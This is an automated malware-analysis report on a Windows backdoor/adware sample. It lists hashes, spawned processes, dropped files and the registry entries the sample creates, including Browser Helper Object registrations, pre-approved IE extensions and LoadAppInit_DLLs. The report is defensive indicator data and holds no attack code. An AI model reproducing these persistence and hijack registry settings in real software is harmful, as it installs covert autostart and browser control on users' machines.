Gen:Variant.Adware.MPlug.38 (B) (Emsisoft), Gen:Variant.Adware.MPlug.38 (AdAware), Backdoor.Win32.PcClient.FD (Lavasoft MAS)
Behaviour: Backdoor, Adware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 874a6a15d18c264327f5c81ec98e2cf9
SHA1: b90f3dd3fba951e828a2a234121e3fe3916cc230
SHA256: 4e8aed5e3c3e1520d6e4a473dca4d0a5240c3a36ddbd4aa1ec2e7adfef5ea047
SSDeep: 12288:Bz5KLZTKN8Vgo 2PlRiTPYwfGnU/3dMvb:Bz4LZTKzOoTPYwfGnmMT
Size: 465920 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-09-04 03:38:00
Analyzed on: WindowsXP SP3 32-bit
Summary: Backdoor. Malware that enables remote control of the victim's machine.
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Backdoor creates the following process(es):
regsvr32.exe:1932
regsvr32.exe:1980
ArmorerRise.xyz.exe:2036
%original file name%.exe:1176
%original file name%.exe:1988
%original file name%.exe:368
%original file name%.exe:1888
%original file name%.exe:188
%original file name%.exe:1016
rundll32.exe:1432
rundll32.exe:1196
The Backdoor injects its code into the following process(es):
No processes have been created.
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process regsvr32.exe:1932 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}-log.txt (57034 bytes)
The process ArmorerRise.xyz.exe:2036 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\TailCutter\TailCutter.dll (80814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tf00294823.dll (7972 bytes)
The process %original file name%.exe:1176 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca.part (71639 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb (13 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\a6316e1ae4dae3cab1ad0965983a8e70.ini (517 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.exe (1504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\loader.gif (2 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\9Bgp6JPux0JTfR[1].ca (129298 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll (6700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7C30\images\progressbar.gif (15 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3e01bea6 (0 bytes)
%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dat (0 bytes)
The process %original file name%.exe:1988 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\2UzDN7fW9Yl4sH[1].ca (65187 bytes)
%Program Files%\ActiveCoupon\ActiveCoupon.exe (2486 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca.part (38114 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\2e3398c745d7293bb1ad0965983a8e70.ini (294 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\478\images\progressbar.gif (15 bytes)
%Program Files%\ActiveCoupon\ActiveCoupon.dat (312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\478\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1818da5e\temp.ca (0 bytes)
The process %original file name%.exe:368 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\bg.ca.part (6 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Startup\874a6a15d18c264327f5c81ec98e2cf9.lnk (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\5[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\3.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(5).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\2.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\6.ini.tmp (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\%original file name%.exe (16544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\2[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(3).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\874a6a15d18c264327f5c81ec98e2cf9.dat (866 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(2).ini (6 bytes)
%Documents and Settings%\All Users\Application Data\{c5c5d690-bdd5-c94a-c5c5-5d690bdd5a42}\%original file name%.exe (16544 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\4[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\ArmorerRise.xyz.exe (16584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\3[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\6[1].txt (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\5.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\4.ini.tmp (21 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\temp\task(4).ini (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\5.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\4.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\3.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CCC0\steps\2.ini (0 bytes)
The process %original file name%.exe:1888 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (2 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\d2bec04cb91e9cb6b1ad0965983a8e70.ini (150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca.part (31648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\progressbar.gif (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\Oo8yOHF14wFvBA[1].ca (29424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\69C0\images\loader.gif (2 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\r1.mytholiday[1] (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0f01cb84\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\098259e7 (0 bytes)
The process %original file name%.exe:188 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\progressbar.gif (15 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll (6665 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.exe (1504 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2C80\images\loader.gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca.part (43652 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\73515851bcb7cafbb1ad0965983a8e70.ini (522 bytes)
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\xoL9D9NSNKXd4Z[1].ca (123415 bytes)
The Backdoor deletes the following file(s):
%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3f8b64b1 (0 bytes)
The process %original file name%.exe:1016 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1980\images\loader.gif (2 bytes)
%Program Files%\Chime\Chime.exe (1504 bytes)
%Documents and Settings%\All Users\Application Data\17537857206796671995\3e3e983e008005d3b1ad0965983a8e70.ini (285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca.part (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca.part (16744 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[2] (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\XwPLangqfnEVNV[1].ca (16664 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1980\images\progressbar.gif (15 bytes)
%Program Files%\Chime\Chime.dat (5 bytes)
The Backdoor deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\0e466769 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1fb88069 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\0e466769\temp.ca (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\r1.mytholiday[1] (0 bytes)
Registry activity
The process regsvr32.exe:1932 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0]
"(Default)" = "IEPluginLib"
[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{6942a161-f713-42a7-a4aa-3bafc71fc8a6}" = "1"
[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"
[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\TypeLib]
"Version" = "1.0"
[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9]
"(Default)" = "BrrOwsiNGclEarly"
[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\0\win32]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.tlb"
[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_\CurVer]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9"
[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\ProgID]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9"
[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\VersionIndependentProgID]
"(Default)" = "P6942a161_f713_42a7_a4aa_3bafc71fc8a6_"
[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"
[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}]
"(Default)" = "IRegistry"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = ""
[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = "BrrOwsiNGclEarly"
[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_\CLSID]
"(Default)" = "{6942a161-f713-42a7-a4aa-3bafc71fc8a6}"
[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"
[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{968EDBEB-64FB-4E5F-9AB0-47B477C3AA7B}\TypeLib]
"Version" = "1.0"
[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.9\CLSID]
"(Default)" = "{6942a161-f713-42a7-a4aa-3bafc71fc8a6}"
[HKCR\TypeLib\{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}\1.0\HELPDIR]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly"
[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}]
"(Default)" = "IRuntime"
[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\InprocServer32]
"(Default)" = "%Program Files%\BrrOwsiNGclEarly\pbk7K2hRvvulDG.dll"
[HKCR\P6942a161_f713_42a7_a4aa_3bafc71fc8a6_.P6942a161_f713_42a7_a4aa_3bafc71fc8a6_]
"(Default)" = "BrrOwsiNGclEarly"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 23 59 E0 34 27 93 FA 50 40 84 2D 22 09 F9 23"
[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}]
"(Default)" = "IPlaghinMein"
[HKCR\Interface\{EEAE9EB9-883A-447D-A4E4-E3A3B5BAEA51}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{3429C8E8-686E-40FB-AB2E-1EE3A12ED764}\TypeLib]
"(Default)" = "{A0B55F99-F893-4F84-AE82-CAE0E70DFDFA}"
[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = ""
[HKCR\CLSID\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}\Programmable]
"(Default)" = ""
[HKCR\Interface\{22D8077A-5A6B-4053-8799-8A288D60F8B8}]
"(Default)" = "ILocalStorage"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6942a161-f713-42a7-a4aa-3bafc71fc8a6}]
"(Default)" = "BrrOwsiNGclEarly"
The process regsvr32.exe:1980 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\0\win32]
"(Default)" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.tlb"
[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = ""
[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_\CLSID]
"(Default)" = "{6dd13515-e089-4fae-8645-2fa8c57153de}"
[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = "WWhiteCouPooni"
[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0]
"(Default)" = "IEPluginLib"
[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\ProgID]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_.9"
[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\VersionIndependentProgID]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_"
[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}]
"(Default)" = "IPlaghinMein"
[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"
[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\TypeLib]
"Version" = "1.0"
[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_]
"(Default)" = "WWhiteCouPooni"
[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_.9\CLSID]
"(Default)" = "{6dd13515-e089-4fae-8645-2fa8c57153de}"
[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}]
"(Default)" = "ILocalStorage"
[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"
[HKCR\Interface\{9CDBA1D4-51B1-409D-8875-9372C5D9F00B}]
"(Default)" = "IRegistry"
[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_.9]
"(Default)" = "WWhiteCouPooni"
[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\Programmable]
"(Default)" = ""
[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"
[HKCR\Interface\{48D5A9B3-3798-4F4B-925B-6E980CAEA8A4}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C4 D3 10 D1 CD AA 10 F1 E6 87 98 BE 13 27 48 F6"
[HKCR\CLSID\{6dd13515-e089-4fae-8645-2fa8c57153de}\InprocServer32]
"(Default)" = "%Program Files%\WWhiteCouPooni\7qwHG4CXj1mdR3.dll"
[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}]
"(Default)" = "IRuntime"
[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\TypeLib]
"Version" = "1.0"
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = ""
[HKCR\TypeLib\{40951615-F2E2-4855-9BB0-68F80D247514}\1.0\HELPDIR]
"(Default)" = "%Program Files%\WWhiteCouPooni"
[HKCR\Interface\{ECE17BD5-B1EA-439C-9F52-E6E11F71B557}\TypeLib]
"(Default)" = "{40951615-F2E2-4855-9BB0-68F80D247514}"
[HKCR\Interface\{00464E24-6D13-4B49-AE99-B64BADED21D7}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\P6dd13515_e089_4fae_8645_2fa8c57153de_.P6dd13515_e089_4fae_8645_2fa8c57153de_\CurVer]
"(Default)" = "P6dd13515_e089_4fae_8645_2fa8c57153de_.9"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{6dd13515-e089-4fae-8645-2fa8c57153de}" = "1"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6dd13515-e089-4fae-8645-2fa8c57153de}]
"(Default)" = "WWhiteCouPooni"
"NoExplorer" = "1"
The process ArmorerRise.xyz.exe:2036 makes changes in the system registry.
The Backdoor creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TAILCU~1\TAILCU~1.DLL,_uninstall /un /uq"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"fe94ce1e" = "V/////%%"
"3c09c42b" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"Publisher" = "ArmorerRise"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"3c09c42b" = "///%"
"0dc3ee96" = "/P////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"NoRepair" = "1"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"f0bf0bde" = "///%"
"bbf88800" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"dbaf3ce3" = "/P////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"0dc3ee96" = "/P////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"DisplayName" = "ArmorerRise"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e46c271e" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"a2e3b941" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"NoModify" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"State" = "0"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"c99a5f5c" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"e46c271e" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2]
"iiid" = "1"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"c99a5f5c" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{c6d15ff2}]
"Cache" = "9428760297565573948"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_c6d15ff2\eae10f9d]
"65114b36" = "Vl/l////"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470]
"State" = "0"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"
[HKLM\SOFTWARE\3bfe4f51-b875-2a84-b315-bd455608b63d\59292325306096470\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"8b9e4cbc" = "V/////%%"
